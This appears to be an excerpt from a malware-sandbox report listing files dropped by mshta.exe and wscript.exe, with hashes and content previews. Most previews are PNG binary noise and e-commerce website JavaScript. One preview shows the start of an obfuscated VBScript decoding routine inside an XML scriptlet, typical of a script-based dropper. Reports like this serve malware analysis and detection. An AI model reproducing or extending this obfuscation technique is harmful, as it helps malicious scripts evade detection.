                                                                                                                                                                                                                            SHA-512:F9E3CF7AF647509275445163BBE7D410C0B4D868A88C4C4C1F1B919CB39F1CCD096A75072B729BD1AB4359653DDBE3F416386CCDE4E6098041A0557E8DA51D58
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................(..........C....................................................................C.......................................................................(................................................V.............................!.."1..AQ..#2aq...BRX.......$'5G.%3bu.....(4CSt...&UV.....................................]..........................!1.."AQ.aq....2...#....'BRU....Sbr....$%35F.&4Ct..7VW.DET....................?..#.._.....=G.0.(..<...................1..L.....C.........`at00...]......C.........`at00...]......C......H.._.......r.c.G..a6=.h.,a.$1g?]M.."..lYk..#..t.#J.!.W(..DB:.a............@az{....../..>.(..h.i....G.......,..m...bF,.............=c..O.{'..........y.n.p.~DT.....e..`.._.?...:...o......?.......r...#..._..e..`.._.?...:...o........f.?.u....U...a~2E..9.......~c....&.._
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):305658
                                                                                                                                                                                                                            Entropy (8bit):7.996546187796282
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:6144:h4SFEZVFVWcubD9BsWTfg40H1kOFMQc80e/kqS2Tt3fgMNXQkCJNr:hjFEZV3WcSfgp1kOxcA/kq/3fgM5Qvx
                                                                                                                                                                                                                            MD5:0D2B22A16621D289146DFAF58E39C9B0
                                                                                                                                                                                                                            SHA1:CBC626B4B304D3160A5CAE052A327BFAE19ACADB
                                                                                                                                                                                                                            SHA-256:B7992F8360BC3CCAAEACD4129BAE5EBAC8E0B23044A9D51D20B49420F73190EB
                                                                                                                                                                                                                            SHA-512:BDF3724B5A6B9E5C36B3FB3BCC779B7414B050F56545A6B2DFC3DA996621001CF0084CF3416CAC6CEAAA8E2C4E86FB0136E07855C474139C6BBBD9BC491D7C41
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..y.-.Y.......<.w.{..4.... ..........vAAR.L.........;6.qR)..c0`9&..!..b..0....kB.iz.....?.Z.....=.s.....9.......k..7..q.0.".-..#..s.6~...0..^+#Z:....rB.g.7....d....k.i.v.].8..{.F..[1.....;j.....g...F.t2.8...'..{6n.....1.....<.43..E^7..I.....#/.......(...+.......,C.zNws...G.N.......ag..S^...._...v.4...F.i.:'i..........Z;..a.......#...)....$..3...:.......E.Y...p...q.x2..8..iPe..;M..i.(a|.8.y..O...5.....<!.<eQm........&..8.v...e|?.wy).GX....?...[.JVr..6.f....^....k.i....j.1L.1...n.;.9.....:..q..g....,..Y.A.o.9.....#.N..S.....M.X?.k.Id|.k.g.H..y:...K8.W..z..uy^..Y.p..Z.].?Y.-C./.."#..+Y.J^j...Y.E..e9...t.l.M_.d..ag..r..'.q......S.a!.........cZ..=........M]...t4...2.e.l....y.1...x.....i..s...[.....~...p.....4...&..~...W...An.c/.V..qe..\.E...v...0{k;3.0\..w|1.....v.3..,...E.dM+.4..'.g3......6..I.?P8..q.m....k'.=..i....i^_.i....g=l.cIvz...^....B.,.q.7..!......L#....d%.Qz..
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 192 x 296, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):42416
                                                                                                                                                                                                                            Entropy (8bit):7.989150003310406
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:kfh0yapmFPej8Dx+THxWJdj2sdsBTFT/UX6B82/V8TmkR4eK:68EejDBTLdmQ
                                                                                                                                                                                                                            MD5:2F17AD57ECBFC45AC503ED546B55D656
                                                                                                                                                                                                                            SHA1:C1C907BF9F1B18E40C9BED81DBBE864C38ED2906
                                                                                                                                                                                                                            SHA-256:CD22A7CB21E98FACF0FD0940A03687CE1EE26B02C5ED55AA4FA4ECF747C15070
                                                                                                                                                                                                                            SHA-512:EDE5FABEBEC983E64C7B74511B5C512CC1D1EC6EA160E9CEA3285AEE5F439B084C160072E7CFCCE711281770C7F499E5351E61462825F3B2FB5906EC9FCD4593
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.......(........\....pHYs............... .IDATx..y.e.]....}....UWWWU.....n$!..-1.V....c.l.,91.X,.0.q..B.b'`.8.....b.$...m$.0.!..ZBc.]U].{..;.../...s_.z.....[..3..o......<..V..o..Q8!..|.?.W.-.G0................s.<.....%......?..C.F(....*....w.C.=.y..Or........7......<......g;xI..$.............8..%...zT.o..5.'..s.=...@.K..K...&......=.=...t%........%,An.'.g..Or...t....b^>.@.G..{S.(.m.........6./u3..).....}.}..t@.3.EX|yA!U..#.z..../q...:.3(...)....@"..x.[t@.7..r......._....Oc.....X.`.4../uK..A........?f...R..^9t.e.2..E.)bU.uA........>.yZ;..'..W.+....5h..%..i..p....1....'..2..f...b...z..7.".*..A'3t2...~.4.|..,}...RP.....!Y[...?.7..C....?.ZqUZ.....mO..G......S.....{..>q..v@}JBpU-...F........7..'.;.....w..........,..G.]...<..96..Oh.}........}~..1.V..{-2(.{...wQ..u,....8q....:.R?...[^.i.s.=.c..OY.....E....v.......A..~..!..}.O...7....v.a..>....%f}.......6...4...cX..og.....,^..../ls.O.....9.. ............#Ob..F....gz.f....'Y.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 192 x 296, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):26631
                                                                                                                                                                                                                            Entropy (8bit):7.975066122485574
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:yc1rfQTCwdemRYfKXhEWM1HoID94gYjm4SuD:yc5fQmwUmRYfihErHoS94+uD
                                                                                                                                                                                                                            MD5:7AE99EEF395A8A7428DB4F7DDBD535B7
                                                                                                                                                                                                                            SHA1:759AAAF5D3DC7F97BFB42A5C8A3CABBA78668F53
                                                                                                                                                                                                                            SHA-256:DAE16355C9CA16107DCC1532BB5CEE820440248BF50374716A4E003A4E53461E
                                                                                                                                                                                                                            SHA-512:D327F781F1FF7EF5D0424518CB396CA48E4EA7AEF7FDE067E3830C854F629B4EEDD063EB7E3FF8D6EF89C9B2F954D78AEE6352C02F4966546BC4522DA67B4452
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.......(........\....pHYs............... .IDATx..y.$Gu'.}.u.=.s..fFf$...I\6k!....@...k...{......Z....$..].ds....~6 .lc.I........IH3..T.LOOwWU..?"^...K3U3o>=U........;"..D..[...U....V.6.0...O.A..V.<.."`..m.....6....H.5..[7.....4....Y ..g..J.|...4.m;.iWM.b.x......d.........|..n;+..^l.......x..4.7..a..[.E....U.$.......4.-M.O..4m&.;Z...#....4.KZ....c...K.Fw/..7.{q..O.1".`#....8...X.DalM.F.f..t.....=..(..y._........4.3..a..B.g.b....u.}'x@...i7...)&.....c...=....t....`..{v..\u.Gr4t.;....>.Sx.7..<tL.=.i..>X.8y.`|.....N.H....2PV}S[......3f.._.~.i..jg....+@...q=`*..=.....)......%.\Z#..'z$..O..S..:.}..p...=....x.U.F..5Xs..h>...4.S......<....[..Y.s.sw.g..3_.....@...Am.8.....+x.Eo.3....0.S.,....)......].-W._...S....}.O..?.[.m.^......y..fL...gc...@..S.Q.h|....?..;>..g...x...P..G....>4.M}...'...3.....|../:..[..z..+_......}.~..`.+..-...W..On?..(.......QL~./0./.v......a./....?......H.`=pBK..F..~...d~.h..?.M..........~.....].hn=..oyu.?.,h.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):73030
                                                                                                                                                                                                                            Entropy (8bit):6.11057987816918
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:4c/e9ctt1/dZuSyQAvLlNC6uyEQcocibqccchcScs/t+BOtsQaR4:/GK71VZuSLWlU3PULm5sV+otT
                                                                                                                                                                                                                            MD5:196D643C13C70CCDAD9F353EF1BE3BC0
                                                                                                                                                                                                                            SHA1:D5AA2862E189B1DE64CBA5FBF1956F2D987C7FF0
                                                                                                                                                                                                                            SHA-256:379B13D576D1B5991FE14E5C4D05C917D34282B038E0BBCE7A9A2C48AE90CF35
                                                                                                                                                                                                                            SHA-512:965B996315AD5B335A97060FB2B36F3C151563572241F7AB5132480CC3517D42B68A894335195D01BC73CAAB96023B1C9D2E5214A75296C7B77E7B5C3C4A7AF3
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[9442],{26311:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var o,i=n(32735);function a(){return(a=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o])}return e}).apply(this,arguments)}const r=function(e){return i.createElement("svg",a({viewBox:"0 0 18 11","aria-labelledby":"arrowIcon arrowDesc"},e),o||(o=i.createElement("path",{fill:"inherit",d:"M2.1 0L0 2.1 9 11l9-8.9L15.9 0 9 6.8 2.1 0z"})))}},78364:(e,t,n)=>{"use strict";n.d(t,{Z:()=>c});var o,i,a=n(32735);function r(){return(r=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o])}return e}).apply(this,arguments)}const c=function(e){return a.createElement("svg",r({viewBox:"0 0 25 25","aria-labelledby":"handtalkIcon handtalkDesc"},
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (374)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):467
                                                                                                                                                                                                                            Entropy (8bit):5.626643783338183
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:+px/hRFVGywjr8Tuq8hvhFcaFyvz+ULEr2HK:cnRF4ywPBq8hDc0yvzPoyq
                                                                                                                                                                                                                            MD5:8F5653EE7C8EE74F0D4DF359343936D1
                                                                                                                                                                                                                            SHA1:897F35A7BAB39B76FBC7519960DF0A72D94C7E43
                                                                                                                                                                                                                            SHA-256:6A4C45C194639AD7CA5F4F283619E0841298BBA4D976B072DBAA7DB6388F3637
                                                                                                                                                                                                                            SHA-512:B65A16AD929C88E73F6DEB12FFE52398BF0F65DBAD01465F1E6E5CBB2DB023397E09BF8D12EC5DEFA2294B8F09CB8EC0514F2D6CEAD06572C7C65E5824C50949
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[6265],{50859:(o,t,n)=>{n.r(t),n.d(t,{default:()=>e});const e=(0,n(56875).vJ)(["body{color:#666;background:#f1f1f1;font-family:",";-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;}a{text-decoration:none;color:#666;}"],(function(o){return o.theme.fontFamily}))}}]);.//# sourceMappingURL=catalogo-ui-americanas-desktop-global-style.eee763bba4c682851831.js.map
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (315)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):408
                                                                                                                                                                                                                            Entropy (8bit):5.551639931235917
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:+Ep1Jzp1J+rmWN3Nis+tFggO9leGKW+dRcuV6k0mgzVTwEWIus27ALErv3uL1QOb:+pmKdmjYeGKWMdI5LErveLy8
                                                                                                                                                                                                                            MD5:E2141C717ACED19353C843E121FB8617
                                                                                                                                                                                                                            SHA1:AD42B5055A1B762110695CECC8E228221548AE79
                                                                                                                                                                                                                            SHA-256:AD9E2DC2C63617447BD5D59159E971451A6C31AC4C59053902C1FFD525118AFF
                                                                                                                                                                                                                            SHA-512:B643292EF1FAD1249BA7509E29AEAB636A0D13D22CDE082D1E9D9D77718966B0D16501F7F527FD125194A472D7E3B636CC3837EF317AC8479C16F5455CC2CD2D
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[5335],{99838:(e,n,_)=>{_.r(n),_.d(n,{default:()=>t});var r=_(32735).createElement;const t=function(e){var n=e.publication,_=e.renderComponent;return n?n.children.map((function(e){return r("div",{key:e._id},_(e))})):null}}}]);.//# sourceMappingURL=catalogo-ui-americanas-desktop-zion-content.6b35577201554a5b827f.js.map
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (6788)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):6882
                                                                                                                                                                                                                            Entropy (8bit):5.287000980875957
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:nKKmYGrF+dinRfe4fY7IpfWAbKvfrdcBYDAmYkYDymX0VFceUDtRMb/AtRMQc:nlmwg9Y7e3uZWYr/YymX0YDhR/RU
                                                                                                                                                                                                                            MD5:685F3EAA88CD84793FF809193388D049
                                                                                                                                                                                                                            SHA1:125250B977A6C4CCCD39B41C94B6B84E517549DC
                                                                                                                                                                                                                            SHA-256:2A603005CA16220909E0A87AC2A9D38E797E6E6694C5E53F85BCB3A505856B35
                                                                                                                                                                                                                            SHA-512:BB153168FC91F0FFD990BBCE1E3DFAAA0F10D1BFE99F458FCCF0CBD47421896E0EE0EE45EE00114972B5AD0C1CB0B0E591399DE4133A8CF923569192E425780F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[863],{23970:(t,e,n)=>{n.d(e,{n:()=>C});var r=n(20011),o=n(32735),a=n(56875),i=o.createElement,c=function(t){var e=t.styles,n=void 0===e?{}:e,r=t.children,o=n.textAlign||n.align;return i("p",{className:"text",style:{textAlign:o||"initial",fontSize:14}},r)},u=o.createElement,l=function(t){var e=t.type,n=t.children;return"wrapper-ordered-list-item"===e?u("ol",{style:{listStyle:"decimal",fontSize:14}},n):u("ul",{style:{listStyle:"disc",fontSize:14}},n)},s=o.createElement,d=function(t){var e=t.children;return s("li",{style:{listStyle:"inherit"}},e)},f=o.createElement,p=function(t){var e=t.type,n=t.children;switch(e){case"header-one":return f("h1",{style:{fontSize:"22px",fontWeight:"bold"}},n);case"header-two":return f("h2",{style:{fontSize:"18px",fontWeight:"bold"}},n);case"header-three":return f("h3",{style:{fontSize:"16px",fontWeight:"bold"}},n)}return f("h1",{style:{fontSize:"22px",fontWeight:"bold"
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (12382)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12476
                                                                                                                                                                                                                            Entropy (8bit):5.394946879527314
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:B1V067CXDOXj09tmco2kGXzwz8FQ/RIKB7:BDR73cRXzwwy/OKR
                                                                                                                                                                                                                            MD5:401635181132CBA3784868D7AC1CDDB9
                                                                                                                                                                                                                            SHA1:6A92E910F53A5C851C6E9E65EA3B408B4DB4C463
                                                                                                                                                                                                                            SHA-256:94D1AFBEFB2D30DB4899367A2164F18D106578658A50A061159E35C6A7D1E7D4
                                                                                                                                                                                                                            SHA-512:B70D6B8A6AFFCC8651EAE1E86D14E340046EBD2EB7F8F8E25D90EA17AED46C0D769F1067DA86098381E0A45AC1083A1AD87EEC8B6F52DAB1B15148951AF798B7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[232],{3126:(t,e,n)=>{"use strict";n.d(e,{Z:()=>o});var r,i=n(32735);function a(){return(a=Object.assign?Object.assign.bind():function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(t[r]=n[r])}return t}).apply(this,arguments)}const o=function(t){return i.createElement("svg",a({fill:"#F80032",width:25,height:25,viewBox:"0 0 25 25",xmlns:"http://www.w3.org/2000/svg"},t),r||(r=i.createElement("path",{d:"M7.897 4.658a.762.762 0 011.077-1.077l8.38 8.38.001.001a.762.762 0 010 1.077L8.974 21.42a.762.762 0 11-1.077-1.077l7.842-7.842-7.842-7.843z"})))}},45750:(t,e,n)=>{var r=n(85973),i=n(28148),a=n(78746),o=Math.max,s=Math.min;t.exports=function(t,e,n){var l,c,u,f,h,d,p=0,m=!1,v=!1,g=!0;if("function"!=typeof t)throw new TypeError("Expected a function");function w(e){var n=l,r=c;return l=c=void 0,p=e,f=t.apply(r,n)}function y(t){return p=t,h=setTimeout
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1501)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1591
                                                                                                                                                                                                                            Entropy (8bit):5.586539109428292
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:c2nRFsRXtVDj8yAyIKWpmFbi6tzeMdeL5TNIFnFEZAMY8FHmnWoVBjVZ+VJrcrY2:/sDxD1ZcMdeLNNIFn5MYUGVVBjVIVJrw
                                                                                                                                                                                                                            MD5:616A4B04A8AF6EAD79163CDEC1057F69
                                                                                                                                                                                                                            SHA1:56FF9FFC261E7A6B3C32D10F941A90304CADA1DB
                                                                                                                                                                                                                            SHA-256:0E41983F2EC1B2441DE0FDF56337B7BF91F0F18B4A7E3A07FAD638CA6FA484E4
                                                                                                                                                                                                                            SHA-512:41D6B910438705CB934E386AFA9E0B5C7DC8E85BFC18A9F57A2FC47CBA91FCCF07D4F54B85931F48CEB6D74CB8E6858B661A9725650941D78D5C0C250ADC3379
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[1580],{78565:(t,e,i)=>{i.r(e),i.d(e,{default:()=>n});const n=i(24635).default},24635:(t,e,i)=>{i.r(e),i.d(e,{default:()=>c});var n=i(32735),o=i(56875),l=n.createElement,h=o.ZP.div.withConfig({displayName:"src__Wrapper",componentId:"sc-10z0zf3-0"})(["h1,h2,h3{","}"],(function(t){var e=t.theme,i=t.colorText;return(0,o.iv)(["margin-bottom:10px;text-transform:",";font-weight:bold;color:",";"],e.titleTransform,i||e.bgColor||e.grey.dark)})),s=o.ZP.h1.withConfig({displayName:"src__Title",componentId:"sc-10z0zf3-1"})(["font-size:22px;line-height:30px;@media (min-width:680px){font-size:28px;line-height:40px;}"]),d=o.ZP.h2.withConfig({displayName:"src__SessionTitle",componentId:"sc-10z0zf3-2"})(["font-size:18px;line-height:24px;@media (min-width:680px){font-size:26px;line-height:36px;}"]),r=o.ZP.h3.withConfig({displayName:"src__SubTitle",componentId:"sc-10z0zf3-3"})(["font-size:20px;line-height:24px;@media
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (3000), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):26369
                                                                                                                                                                                                                            Entropy (8bit):5.9430258911182605
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:meKmzxie+ZYMthZXjus3dok1ZnaVopRoppoyOqJuogGu:VXdie+ZFZuCvZdye
                                                                                                                                                                                                                            MD5:194104DD5740575C4F3F945E68C122EC
                                                                                                                                                                                                                            SHA1:C6C3A89DFB0BA04F4454C3EC85A0DF05505C24F0
                                                                                                                                                                                                                            SHA-256:B3F09B1FE6E4AB575B0F6E2C8C47F515AAA9553EF37894039176AD35477DF3EB
                                                                                                                                                                                                                            SHA-512:1B34852B7C7236A76F6DA44938549C51C65836FA1CE4214A83FE17032AB80FBE905277F780D6D90794EE1DFBEEC5D4FBFAF0A6468C32D4CE7026165B4220DA53
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8" ?>..<component id="component2">......<script language="VBScript">..<![CDATA[......function deoFPJZoq9XmMc7PnPKQjH_17(pJ6cXuwUrvj_26, hwmhoukhKJ_1)..Dim yJ2RT5nPqRN_27, lfuPegyv_28..yJ2RT5nPqRN_27 = asc(Mid(pJ6cXuwUrvj_26,1,1)) - 65..pJ6cXuwUrvj_26 = Mid(pJ6cXuwUrvj_26,2,Len(pJ6cXuwUrvj_26)-1)..Dim VHMajnfx_29..Dim rleSaYXXW1mDQox9GqIcg_30..lfuPegyv_28 = "".. while (Len(pJ6cXuwUrvj_26) > 0).. Xjr5EWb9YMSXd8FbdIe2KD_80 = Mid(pJ6cXuwUrvj_26,1,1) .. VHMajnfx_29 = (asc(Xjr5EWb9YMSXd8FbdIe2KD_80)-65) .. rleSaYXXW1mDQox9GqIcg_30 = (asc(Mid(pJ6cXuwUrvj_26,2,1))-65).. lfuPegyv_28 = lfuPegyv_28 & (Chr(( (VHMajnfx_29) * 25 + rleSaYXXW1mDQox9GqIcg_30 - yJ2RT5nPqRN_27 - hwmhoukhKJ_1))) .. pJ6cXuwUrvj_26 = Mid(pJ6cXuwUrvj_26,3,Len(pJ6cXuwUrvj_26)-2).... wEnd.. .. deoFPJZoq9XmMc7PnPKQjH_17 = lfuPegyv_28..end function........const hwmhoukhKJ_1 = 92..UvEyZZ4M_2 = deoFPJZoq9XmMc7PnPKQjH_17("TGK" , hwmhoukhKJ_1)..WgLpLHYlNCXZQCBNni_3 = deoFPJZ
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (39875)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):409164
                                                                                                                                                                                                                            Entropy (8bit):5.572766059085652
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:Px7jMGmBYnsbQBUZ1HcRCrGRe5NAaa0Mf3/eNO9:RMpbOU7Hc8Se5a5
                                                                                                                                                                                                                            MD5:91644318B682B64C2B1AA40E5F6A4FDB
                                                                                                                                                                                                                            SHA1:6DEB344D682B995DDAB34CEBC097CDED3C7C79BD
                                                                                                                                                                                                                            SHA-256:AB9C39EA323567A468CB778C1BE0E0B17ADE25D90EDEDD0E4A6138EB9682A388
                                                                                                                                                                                                                            SHA-512:4381E202C5263069DB5937976256EDF67F9BF61BF2021A95D0A8F23B47716B7166F8D363942FCBA91074994608A39BE8F990695157E1EFBB4DB70A77B9E5114E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"204",. . "macros":[{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"screen"},{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"product"},{"function":"__jsm","vtp_javascript":["template","(function(){try{return ",["escape",["macro",2],8,16],".map(function(a){return a.id})}catch(a){}})();"]},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"valorSacola"},{"function":"__jsm","vtp_javascript":["template","(function(){try{return ",["escape",["macro",2],8,16],".map(function(a){return a.department})}catch(a){}})();"]},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQu
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):293029
                                                                                                                                                                                                                            Entropy (8bit):7.997376111410533
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:6144:BXRs+CdR/dKYPaTT1wCbFSp8d2hNRb8+YAsGGjLsp:0dVQhTT1w+FSHNF8+YAs8
                                                                                                                                                                                                                            MD5:13A94D342C713C85222FED81CD4A3D54
                                                                                                                                                                                                                            SHA1:4876993C9404CE19EBC225F88A30359A0C1CFDE9
                                                                                                                                                                                                                            SHA-256:24B644D1A837FCE5307C990DC576072A226B68085A2D86059EBACBA596F60D67
                                                                                                                                                                                                                            SHA-512:001C0BA2A5EB85F51BD19C37812B6BF635869E8FF1F2DC57984D4F8E1BF159008A480899D11E9E5D631EFB1ED45422EE29572DC1FA6E880B65B31C022B320FC9
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..i.$.u..;7........6H.A..)qH....FhR.9f,Q...[..%.!J.Z8.....7.G.8..GThH.G...P.f.b.......P....@.k7...~KU.=.ps....z....T...{.9w.......&e.d....p.4.]~N.."..e....Bq....K.o..H`,W<0}ap.O....Uk.....m.K...X....)....xIK....U..4o..e,i.Zh^o...:.Z.J3....j....y....)..z.{...o...t%.4.>.>1.D..FW..,\i.]a.+....'...#,S9u..).,..*.m.....G....w...y..+.gR...]....;.M.......V..t......Y.O....$..Z.#{z.......%..."~..Ji:..":.(U...Q.S2_$6 ... =a.JHpa....?.c.E-..P.......'q.#.mW_GW...h...TS;T..j.ze......"..{..VXa..J....]..L..'....m.. ..Y1....?'...vU.#..E^k.....v...b.........Tu.*.?Z...q.....f...)D..M.!!.I..!.......<u...i...1.$.G.r1 F@.pKA.....;.P...Dnpm..*.l.,.7.;.,/oee.D...^.W.YI.y....@k"k.....a.l...7..?..2....W&...Qro..dY.Y....^.q..........I...@3;..eM.DNS.-.......fYMV...c..u.(....Jo.6.y.UK..-%....HrZ....r".q.}...U...Q.#..w...cr..P.fLBsT...m.do..Y<...I.|E...E...zD..MQ.o..,.....U......#..{.T.......y..r.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 250 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):11023
                                                                                                                                                                                                                            Entropy (8bit):7.958484350052868
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:RSHKdFU5BjAPP5ea9q4wgDsnKB+fVxfWT8igARItszv6s6v6v6v6nvJZ6mRzZeKE:4qdFmtAPmnKBAVxIhiXiiinxrwhuswE
                                                                                                                                                                                                                            MD5:15192F94DB7354DA176CA9200FDD57AA
                                                                                                                                                                                                                            SHA1:BA39A813EA8F7FD63100EAD2D1125423F4C6BC08
                                                                                                                                                                                                                            SHA-256:F5D775A23BC44B23C2ABD28FAF1F5F0CBA4CCD4BC744F946BA094C386041B284
                                                                                                                                                                                                                            SHA-512:1EF68A031CF0F92455EEDC034CD14450D6E4DC68C025B334CE62D9D8B81AEAD322BCCA4F9B8272BF70C4DFAAF18644D0FD80D0F2AF23F343A36E9C1C3ADB7FCA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR...............).....pHYs............... .IDATx..]l.W....H},.%./.";.....c.iK....S.....X.."50.....H..1.......t"..b7......D.`.^[T&A'......vv#.._DI..."..C.%V...*~.y~..........s.=. .. .. .. .. .. .. .. .. .. .r........=1.<..0...{8....A.........._.`!.!\...*v..QrB...^..>.....$f..D...0!@..5...@..A.....6Q....dp....&t.......:..-V=.".0.9..Vc.L..P`8<....8....b^..*...*.U......8Q..\....4..d....y.q..B(.....Y8.......... Rhf...........?..f........QF.w.K.~.-....H..a.f@......(<.B..."x..p#.S0`....a...t...c...L..P.kq..\..3....".0`.....QY.C"'...+.g=F_..a.9A.......w.-'+...y....!.._..:.{<.u$..'..0\..S....YKB........`p`..w[...d..#.H..Q@...A...1.=.B....f.#."'4..K.'.2..&....!."..x\|....z...N.Dqa..T.nX.?`..d..D...f...6.W.{.$t.(.8.X....P$..zt.....`..U..zuC=:...Q....3....D....=..L.e.:..rR#. ......J+...x.xrV%. ......7..i.....i.Q.0..p........m}....\.P.]...vw.+D.D.a.+...+.(....(9. x.........'...`.O.}.f....N.6...jVS...9%. ....W\.)h.}..w^kD.D^.A0.t..v..#..;........A.6.h..\S..
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
